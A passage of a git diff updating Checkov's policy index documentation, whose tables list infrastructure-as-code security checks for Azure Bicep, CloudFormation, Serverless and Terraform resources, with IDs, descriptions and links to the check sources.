[AzureFirewallDenyThreatIntelMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureFirewallDenyThreatIntelMode.py) | +| 116 | CKV_AZURE_218 | resource | Microsoft.Network/applicationGateways | Ensure Application Gateway defines secure protocols for in transit communication | Bicep | [AppGWDefinesSecureProtocols.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppGWDefinesSecureProtocols.py) | +| 117 | CKV_AZURE_236 | resource | Microsoft.CognitiveServices/accounts | Ensure that Cognitive Services accounts enable local authentication | Bicep | [CognitiveServicesEnableLocalAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CognitiveServicesEnableLocalAuth.py) | +| 118 | CKV_AZURE_238 | resource | Microsoft.CognitiveServices/accounts | Ensure that Cognitive Services account is not configured with managed identity | Bicep | [CognitiveServicesConfigureIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CognitiveServicesConfigureIdentity.py) | +| 119 | CKV_AZURE_239 | resource | Microsoft.MachineLearningServices/workspaces | Ensure Azure Machine learning workspace is not configured with private endpoint | Bicep | [AzureMLWorkspacePrivateEndpoint.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureMLWorkspacePrivateEndpoint.py) | +| 120 | CKV2_AZURE_27 | resource | Microsoft.Sql/servers | Ensure Azure AD authentication is enabled for Azure SQL (MSSQL) | Bicep | [SQLServerUsesADAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerUsesADAuth.py) | +| 121 | CKV2_AZURE_48 | resource | Microsoft.Databricks/workspaces | Ensure that Databricks Workspaces enables customer-managed key for root DBFS encryption | Bicep | [DatabricksWorkspaceDBFSRootEncryptedWithCustomerManagedKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/DatabricksWorkspaceDBFSRootEncryptedWithCustomerManagedKey.py) | --- diff --git a/docs/5.Policy Index/cloudformation.md b/docs/5.Policy Index/cloudformation.md index 4acc660a0f9..c53dc6276bf 100644 --- a/docs/5.Policy Index/cloudformation.md +++ b/docs/5.Policy Index/cloudformation.md @@ -160,25 +160,30 @@ nav_order: 1 | 149 | CKV_AWS_173 | resource | AWS::Lambda::Function | Check encryption settings for Lambda environment variable | Cloudformation | [LambdaEnvironmentEncryptionSettings.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaEnvironmentEncryptionSettings.py) | | 150 | CKV_AWS_173 | resource | AWS::Serverless::Function | Check encryption settings for Lambda environment variable | Cloudformation | [LambdaEnvironmentEncryptionSettings.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaEnvironmentEncryptionSettings.py) | | 151 | CKV_AWS_174 | resource | AWS::CloudFront::Distribution | Verify CloudFront Distribution Viewer Certificate is using TLS v1.2 | Cloudformation | [CloudFrontTLS12.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/CloudFrontTLS12.py) | -| 152 | CKV_AWS_192 | resource | AWS::WAFv2::WebACL | Ensure WAF prevents message lookup in Log4j2. See CVE-2021-44228 aka log4jshell | Cloudformation | [WAFACLCVE202144228.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/WAFACLCVE202144228.py) | -| 153 | CKV_AWS_193 | resource | AWS::AppSync::GraphQLApi | Ensure AppSync has Logging enabled | Cloudformation | [AppSyncLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/AppSyncLogging.py) | -| 154 | CKV_AWS_194 | resource | AWS::AppSync::GraphQLApi | Ensure AppSync has Field-Level logs enabled | Cloudformation | [AppSyncFieldLevelLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/AppSyncFieldLevelLogs.py) | -| 155 | CKV_AWS_195 | resource | AWS::Glue::Crawler | Ensure Glue component has a security configuration associated | Cloudformation | [GlueSecurityConfigurationEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/GlueSecurityConfigurationEnabled.py) | -| 156 | CKV_AWS_195 | resource | AWS::Glue::DevEndpoint | Ensure Glue component has a security configuration associated | Cloudformation | [GlueSecurityConfigurationEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/GlueSecurityConfigurationEnabled.py) | -| 157 | CKV_AWS_195 | resource | AWS::Glue::Job | Ensure Glue component has a security configuration associated | Cloudformation | [GlueSecurityConfigurationEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/GlueSecurityConfigurationEnabled.py) | -| 158 | CKV_AWS_197 | resource | AWS::AmazonMQ::Broker | Ensure MQ Broker Audit logging is enabled | Cloudformation | [MQBrokerAuditLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/MQBrokerAuditLogging.py) | -| 159 | CKV_AWS_258 | resource | AWS::Lambda::Url | Ensure that Lambda function URLs AuthType is not None | Cloudformation | [LambdaFunctionURLAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaFunctionURLAuth.py) | -| 160 | CKV_AWS_260 | resource | AWS::EC2::SecurityGroup | Ensure no security groups allow ingress from 0.0.0.0:0 to port 80 | Cloudformation | [SecurityGroupUnrestrictedIngress80.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SecurityGroupUnrestrictedIngress80.py) | -| 161 | CKV_AWS_260 | resource | AWS::EC2::SecurityGroupIngress | Ensure no security groups allow ingress from 0.0.0.0:0 to port 80 | Cloudformation | [SecurityGroupUnrestrictedIngress80.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SecurityGroupUnrestrictedIngress80.py) | -| 162 | CKV_AWS_291 | resource | AWS::MSK::Cluster | Ensure MSK nodes are private | Cloudformation | [MSKClusterNodesArePrivate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/MSKClusterNodesArePrivate.py) | -| 163 | CKV_AWS_317 | resource | AWS::Elasticsearch::Domain | Ensure Elasticsearch Domain Audit Logging is enabled | Cloudformation | [ElasticsearchDomainAuditLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ElasticsearchDomainAuditLogging.py) | -| 164 | CKV_AWS_317 | resource | AWS::OpenSearchService::Domain | Ensure Elasticsearch Domain Audit Logging is enabled | Cloudformation | [ElasticsearchDomainAuditLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ElasticsearchDomainAuditLogging.py) | -| 165 | CKV_AWS_360 | resource | AWS::DocDB::DBCluster | Ensure DocumentDB has an adequate backup retention period | Cloudformation | [DocDBBackupRetention.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DocDBBackupRetention.py) | -| 166 | CKV_AWS_361 | resource | AWS::Neptune::DBCluster | Ensure that Neptune DB cluster has automated backups enabled with adequate retention | Cloudformation | [NeptuneClusterBackupRetention.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/NeptuneClusterBackupRetention.py) | -| 167 | CKV_AWS_363 | resource | AWS::Lambda::Function | Ensure Lambda Runtime is not deprecated | Cloudformation | [DeprecatedLambdaRuntime.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DeprecatedLambdaRuntime.py) | -| 168 | CKV_AWS_363 | resource | AWS::Serverless::Function | Ensure Lambda Runtime is not deprecated | Cloudformation | [DeprecatedLambdaRuntime.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DeprecatedLambdaRuntime.py) | -| 169 | CKV_AWS_364 | resource | AWS::Lambda::Permission | Ensure that AWS Lambda function permissions delegated to AWS services are limited by SourceArn or SourceAccount | Cloudformation | [LambdaServicePermission.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaServicePermission.py) | -| 170 | CKV2_AWS_33 | resource | AWS::AppSync::GraphQLApi | Ensure AppSync is protected by WAF | Cloudformation | [AppSyncProtectedByWAF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/graph_checks/AppSyncProtectedByWAF.yaml) | +| 152 | CKV_AWS_187 | resource | AWS::SageMaker::Domain | Ensure Sagemaker domain and notebook instance are encrypted by KMS using a customer managed Key (CMK) | Cloudformation | [SagemakerNotebookEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SagemakerNotebookEncryptedWithCMK.py) | +| 153 | CKV_AWS_187 | resource | AWS::SageMaker::NotebookInstance | Ensure Sagemaker domain and notebook instance are encrypted by KMS using a customer managed Key (CMK) | Cloudformation | [SagemakerNotebookEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SagemakerNotebookEncryptedWithCMK.py) | +| 154 | CKV_AWS_192 | resource | AWS::WAFv2::WebACL | Ensure WAF prevents message lookup in Log4j2. See CVE-2021-44228 aka log4jshell | Cloudformation | [WAFACLCVE202144228.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/WAFACLCVE202144228.py) | +| 155 | CKV_AWS_193 | resource | AWS::AppSync::GraphQLApi | Ensure AppSync has Logging enabled | Cloudformation | [AppSyncLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/AppSyncLogging.py) | +| 156 | CKV_AWS_194 | resource | AWS::AppSync::GraphQLApi | Ensure AppSync has Field-Level logs enabled | Cloudformation | [AppSyncFieldLevelLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/AppSyncFieldLevelLogs.py) | +| 157 | CKV_AWS_195 | resource | AWS::Glue::Crawler | Ensure Glue component has a security configuration associated | Cloudformation | [GlueSecurityConfigurationEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/GlueSecurityConfigurationEnabled.py) | +| 158 | CKV_AWS_195 | resource | AWS::Glue::DevEndpoint | Ensure Glue component has a security configuration associated | Cloudformation | [GlueSecurityConfigurationEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/GlueSecurityConfigurationEnabled.py) | +| 159 | CKV_AWS_195 | resource | AWS::Glue::Job | Ensure Glue component has a security configuration associated | Cloudformation | [GlueSecurityConfigurationEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/GlueSecurityConfigurationEnabled.py) | +| 160 | CKV_AWS_197 | resource | AWS::AmazonMQ::Broker | Ensure MQ Broker Audit logging is enabled | Cloudformation | [MQBrokerAuditLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/MQBrokerAuditLogging.py) | +| 161 | CKV_AWS_258 | resource | AWS::Lambda::Url | Ensure that Lambda function URLs AuthType is not None | Cloudformation | [LambdaFunctionURLAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaFunctionURLAuth.py) | +| 162 | CKV_AWS_260 | resource | AWS::EC2::SecurityGroup | Ensure no security groups allow ingress from 0.0.0.0:0 to port 80 | Cloudformation | [SecurityGroupUnrestrictedIngress80.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SecurityGroupUnrestrictedIngress80.py) | +| 163 | CKV_AWS_260 | resource | AWS::EC2::SecurityGroupIngress | Ensure no security groups allow ingress from 0.0.0.0:0 to port 80 | Cloudformation | [SecurityGroupUnrestrictedIngress80.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SecurityGroupUnrestrictedIngress80.py) | +| 164 | CKV_AWS_291 | resource | AWS::MSK::Cluster | Ensure MSK nodes are private | Cloudformation | [MSKClusterNodesArePrivate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/MSKClusterNodesArePrivate.py) | +| 165 | CKV_AWS_317 | resource | AWS::Elasticsearch::Domain | Ensure Elasticsearch Domain Audit Logging is enabled | Cloudformation | [ElasticsearchDomainAuditLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ElasticsearchDomainAuditLogging.py) | +| 166 | CKV_AWS_317 | resource | AWS::OpenSearchService::Domain | Ensure Elasticsearch Domain Audit Logging is enabled | Cloudformation | [ElasticsearchDomainAuditLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ElasticsearchDomainAuditLogging.py) | +| 167 | CKV_AWS_360 | resource | AWS::DocDB::DBCluster | Ensure DocumentDB has an adequate backup retention period | Cloudformation | [DocDBBackupRetention.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DocDBBackupRetention.py) | +| 168 | CKV_AWS_361 | resource | AWS::Neptune::DBCluster | Ensure that Neptune DB cluster has automated backups enabled with adequate retention | Cloudformation | [NeptuneClusterBackupRetention.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/NeptuneClusterBackupRetention.py) | +| 169 | CKV_AWS_363 | resource | AWS::Lambda::Function | Ensure Lambda Runtime is not deprecated | Cloudformation | [DeprecatedLambdaRuntime.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DeprecatedLambdaRuntime.py) | +| 170 | CKV_AWS_363 | resource | AWS::Serverless::Function | Ensure Lambda Runtime is not deprecated | Cloudformation | [DeprecatedLambdaRuntime.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DeprecatedLambdaRuntime.py) | +| 171 | CKV_AWS_364 | resource | AWS::Lambda::Permission | Ensure that AWS Lambda function permissions delegated to AWS services are limited by SourceArn or SourceAccount | Cloudformation | [LambdaServicePermission.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaServicePermission.py) | +| 172 | CKV_AWS_366 | resource | AWS::Cognito::IdentityPool | Ensure AWS Cognito identity pool does not allow unauthenticated guest access | Cloudformation | [CognitoUnauthenticatedIdentities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/CognitoUnauthenticatedIdentities.py) | +| 173 | CKV2_AWS_33 | resource | AWS::AppSync::GraphQLApi | Ensure AppSync is protected by WAF | Cloudformation | [AppSyncProtectedByWAF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/graph_checks/AppSyncProtectedByWAF.yaml) | +| 174 | CKV2_AWS_68 | resource | AWS::IAM::Role | Ensure SageMaker notebook instance IAM policy is not overly permissive | Cloudformation | [SageMakerIAMPolicyOverlyPermissiveToAllTraffic.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/graph_checks/SageMakerIAMPolicyOverlyPermissiveToAllTraffic.yaml) | +| 175 | CKV2_AWS_68 | resource | AWS::SageMaker::NotebookInstance | Ensure SageMaker notebook instance IAM policy is not overly permissive | Cloudformation | [SageMakerIAMPolicyOverlyPermissiveToAllTraffic.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/graph_checks/SageMakerIAMPolicyOverlyPermissiveToAllTraffic.yaml) | --- diff --git a/docs/5.Policy Index/serverless.md b/docs/5.Policy Index/serverless.md index c8304414c2d..ebe412568ca 100644 --- a/docs/5.Policy Index/serverless.md +++ b/docs/5.Policy Index/serverless.md @@ -170,25 +170,30 @@ nav_order: 1 | 149 | CKV_AWS_173 | resource | AWS::Lambda::Function | Check encryption settings for Lambda environment variable | Cloudformation | [LambdaEnvironmentEncryptionSettings.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaEnvironmentEncryptionSettings.py) | | 150 | CKV_AWS_173 | resource | AWS::Serverless::Function | Check encryption settings for Lambda environment variable | Cloudformation | [LambdaEnvironmentEncryptionSettings.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaEnvironmentEncryptionSettings.py) | | 151 | CKV_AWS_174 | resource | AWS::CloudFront::Distribution | Verify CloudFront Distribution Viewer Certificate is using TLS v1.2 | Cloudformation | [CloudFrontTLS12.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/CloudFrontTLS12.py) | -| 152 | CKV_AWS_192 | resource | AWS::WAFv2::WebACL | Ensure WAF prevents message lookup in Log4j2. See CVE-2021-44228 aka log4jshell | Cloudformation | [WAFACLCVE202144228.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/WAFACLCVE202144228.py) | -| 153 | CKV_AWS_193 | resource | AWS::AppSync::GraphQLApi | Ensure AppSync has Logging enabled | Cloudformation | [AppSyncLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/AppSyncLogging.py) | -| 154 | CKV_AWS_194 | resource | AWS::AppSync::GraphQLApi | Ensure AppSync has Field-Level logs enabled | Cloudformation | [AppSyncFieldLevelLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/AppSyncFieldLevelLogs.py) | -| 155 | CKV_AWS_195 | resource | AWS::Glue::Crawler | Ensure Glue component has a security configuration associated | Cloudformation | [GlueSecurityConfigurationEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/GlueSecurityConfigurationEnabled.py) | -| 156 | CKV_AWS_195 | resource | AWS::Glue::DevEndpoint | Ensure Glue component has a security configuration associated | Cloudformation | [GlueSecurityConfigurationEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/GlueSecurityConfigurationEnabled.py) | -| 157 | CKV_AWS_195 | resource | AWS::Glue::Job | Ensure Glue component has a security configuration associated | Cloudformation | [GlueSecurityConfigurationEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/GlueSecurityConfigurationEnabled.py) | -| 158 | CKV_AWS_197 | resource | AWS::AmazonMQ::Broker | Ensure MQ Broker Audit logging is enabled | Cloudformation | [MQBrokerAuditLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/MQBrokerAuditLogging.py) | -| 159 | CKV_AWS_258 | resource | AWS::Lambda::Url | Ensure that Lambda function URLs AuthType is not None | Cloudformation | [LambdaFunctionURLAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaFunctionURLAuth.py) | -| 160 | CKV_AWS_260 | resource | AWS::EC2::SecurityGroup | Ensure no security groups allow ingress from 0.0.0.0:0 to port 80 | Cloudformation | [SecurityGroupUnrestrictedIngress80.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SecurityGroupUnrestrictedIngress80.py) | -| 161 | CKV_AWS_260 | resource | AWS::EC2::SecurityGroupIngress | Ensure no security groups allow ingress from 0.0.0.0:0 to port 80 | Cloudformation | [SecurityGroupUnrestrictedIngress80.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SecurityGroupUnrestrictedIngress80.py) | -| 162 | CKV_AWS_291 | resource | AWS::MSK::Cluster | Ensure MSK nodes are private | Cloudformation | [MSKClusterNodesArePrivate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/MSKClusterNodesArePrivate.py) | -| 163 | CKV_AWS_317 | resource | AWS::Elasticsearch::Domain | Ensure Elasticsearch Domain Audit Logging is enabled | Cloudformation | [ElasticsearchDomainAuditLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ElasticsearchDomainAuditLogging.py) | -| 164 | CKV_AWS_317 | resource | AWS::OpenSearchService::Domain | Ensure Elasticsearch Domain Audit Logging is enabled | Cloudformation | [ElasticsearchDomainAuditLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ElasticsearchDomainAuditLogging.py) | -| 165 | CKV_AWS_360 | resource | AWS::DocDB::DBCluster | Ensure DocumentDB has an adequate backup retention period | Cloudformation | [DocDBBackupRetention.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DocDBBackupRetention.py) | -| 166 | CKV_AWS_361 | resource | AWS::Neptune::DBCluster | Ensure that Neptune DB cluster has automated backups enabled with adequate retention | Cloudformation | [NeptuneClusterBackupRetention.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/NeptuneClusterBackupRetention.py) | -| 167 | CKV_AWS_363 | resource | AWS::Lambda::Function | Ensure Lambda Runtime is not deprecated | Cloudformation | [DeprecatedLambdaRuntime.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DeprecatedLambdaRuntime.py) | -| 168 | CKV_AWS_363 | resource | AWS::Serverless::Function | Ensure Lambda Runtime is not deprecated | Cloudformation | [DeprecatedLambdaRuntime.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DeprecatedLambdaRuntime.py) | -| 169 | CKV_AWS_364 | resource | AWS::Lambda::Permission | Ensure that AWS Lambda function permissions delegated to AWS services are limited by SourceArn or SourceAccount | Cloudformation | [LambdaServicePermission.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaServicePermission.py) | -| 170 | CKV2_AWS_33 | resource | AWS::AppSync::GraphQLApi | Ensure AppSync is protected by WAF | Cloudformation | [AppSyncProtectedByWAF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/graph_checks/AppSyncProtectedByWAF.yaml) | +| 152 | CKV_AWS_187 | resource | AWS::SageMaker::Domain | Ensure Sagemaker domain and notebook instance are encrypted by KMS using a customer managed Key (CMK) | Cloudformation | [SagemakerNotebookEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SagemakerNotebookEncryptedWithCMK.py) | +| 153 | CKV_AWS_187 | resource | AWS::SageMaker::NotebookInstance | Ensure Sagemaker domain and notebook instance are encrypted by KMS using a customer managed Key (CMK) | Cloudformation | [SagemakerNotebookEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SagemakerNotebookEncryptedWithCMK.py) | +| 154 | CKV_AWS_192 | resource | AWS::WAFv2::WebACL | Ensure WAF prevents message lookup in Log4j2. See CVE-2021-44228 aka log4jshell | Cloudformation | [WAFACLCVE202144228.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/WAFACLCVE202144228.py) | +| 155 | CKV_AWS_193 | resource | AWS::AppSync::GraphQLApi | Ensure AppSync has Logging enabled | Cloudformation | [AppSyncLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/AppSyncLogging.py) | +| 156 | CKV_AWS_194 | resource | AWS::AppSync::GraphQLApi | Ensure AppSync has Field-Level logs enabled | Cloudformation | [AppSyncFieldLevelLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/AppSyncFieldLevelLogs.py) | +| 157 | CKV_AWS_195 | resource | AWS::Glue::Crawler | Ensure Glue component has a security configuration associated | Cloudformation | [GlueSecurityConfigurationEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/GlueSecurityConfigurationEnabled.py) | +| 158 | CKV_AWS_195 | resource | AWS::Glue::DevEndpoint | Ensure Glue component has a security configuration associated | Cloudformation | [GlueSecurityConfigurationEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/GlueSecurityConfigurationEnabled.py) | +| 159 | CKV_AWS_195 | resource | AWS::Glue::Job | Ensure Glue component has a security configuration associated | Cloudformation | [GlueSecurityConfigurationEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/GlueSecurityConfigurationEnabled.py) | +| 160 | CKV_AWS_197 | resource | AWS::AmazonMQ::Broker | Ensure MQ Broker Audit logging is enabled | Cloudformation | [MQBrokerAuditLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/MQBrokerAuditLogging.py) | +| 161 | CKV_AWS_258 | resource | AWS::Lambda::Url | Ensure that Lambda function URLs AuthType is not None | Cloudformation | [LambdaFunctionURLAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaFunctionURLAuth.py) | +| 162 | CKV_AWS_260 | resource | AWS::EC2::SecurityGroup | Ensure no security groups allow ingress from 0.0.0.0:0 to port 80 | Cloudformation | [SecurityGroupUnrestrictedIngress80.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SecurityGroupUnrestrictedIngress80.py) | +| 163 | CKV_AWS_260 | resource | AWS::EC2::SecurityGroupIngress | Ensure no security groups allow ingress from 0.0.0.0:0 to port 80 | Cloudformation | [SecurityGroupUnrestrictedIngress80.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SecurityGroupUnrestrictedIngress80.py) | +| 164 | CKV_AWS_291 | resource | AWS::MSK::Cluster | Ensure MSK nodes are private | Cloudformation | [MSKClusterNodesArePrivate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/MSKClusterNodesArePrivate.py) | +| 165 | CKV_AWS_317 | resource | AWS::Elasticsearch::Domain | Ensure Elasticsearch Domain Audit Logging is enabled | Cloudformation | [ElasticsearchDomainAuditLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ElasticsearchDomainAuditLogging.py) | +| 166 | CKV_AWS_317 | resource | AWS::OpenSearchService::Domain | Ensure Elasticsearch Domain Audit Logging is enabled | Cloudformation | [ElasticsearchDomainAuditLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ElasticsearchDomainAuditLogging.py) | +| 167 | CKV_AWS_360 | resource | AWS::DocDB::DBCluster | Ensure DocumentDB has an adequate backup retention period | Cloudformation | [DocDBBackupRetention.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DocDBBackupRetention.py) | +| 168 | CKV_AWS_361 | resource | AWS::Neptune::DBCluster | Ensure that Neptune DB cluster has automated backups enabled with adequate retention | Cloudformation | [NeptuneClusterBackupRetention.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/NeptuneClusterBackupRetention.py) | +| 169 | CKV_AWS_363 | resource | AWS::Lambda::Function | Ensure Lambda Runtime is not deprecated | Cloudformation | [DeprecatedLambdaRuntime.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DeprecatedLambdaRuntime.py) | +| 170 | CKV_AWS_363 | resource | AWS::Serverless::Function | Ensure Lambda Runtime is not deprecated | Cloudformation | [DeprecatedLambdaRuntime.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DeprecatedLambdaRuntime.py) | +| 171 | CKV_AWS_364 | resource | AWS::Lambda::Permission | Ensure that AWS Lambda function permissions delegated to AWS services are limited by SourceArn or SourceAccount | Cloudformation | [LambdaServicePermission.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaServicePermission.py) | +| 172 | CKV_AWS_366 | resource | AWS::Cognito::IdentityPool | Ensure AWS Cognito identity pool does not allow unauthenticated guest access | Cloudformation | [CognitoUnauthenticatedIdentities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/CognitoUnauthenticatedIdentities.py) | +| 173 | CKV2_AWS_33 | resource | AWS::AppSync::GraphQLApi | Ensure AppSync is protected by WAF | Cloudformation | [AppSyncProtectedByWAF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/graph_checks/AppSyncProtectedByWAF.yaml) | +| 174 | CKV2_AWS_68 | resource | AWS::IAM::Role | Ensure SageMaker notebook instance IAM policy is not overly permissive | Cloudformation | [SageMakerIAMPolicyOverlyPermissiveToAllTraffic.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/graph_checks/SageMakerIAMPolicyOverlyPermissiveToAllTraffic.yaml) | +| 175 | CKV2_AWS_68 | resource | AWS::SageMaker::NotebookInstance | Ensure SageMaker notebook instance IAM policy is not overly permissive | Cloudformation | [SageMakerIAMPolicyOverlyPermissiveToAllTraffic.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/graph_checks/SageMakerIAMPolicyOverlyPermissiveToAllTraffic.yaml) | --- diff --git a/docs/5.Policy Index/terraform.md b/docs/5.Policy Index/terraform.md index 126851dff00..85bca75d135 100644 --- a/docs/5.Policy Index/terraform.md +++ b/docs/5.Policy Index/terraform.md @@ -6,2122 +6,2136 @@ nav_order: 1 # terraform resource scans (auto generated) -| | Id | Type | Entity | Policy | IaC | Resource Link | -|------|-----------------|----------|---------------------------------------------------------|----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|-----------|--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| -| 0 | CKV2_ADO_1 | resource | azuredevops_branch_policy_min_reviewers | Ensure at least two approving reviews for PRs | Terraform | 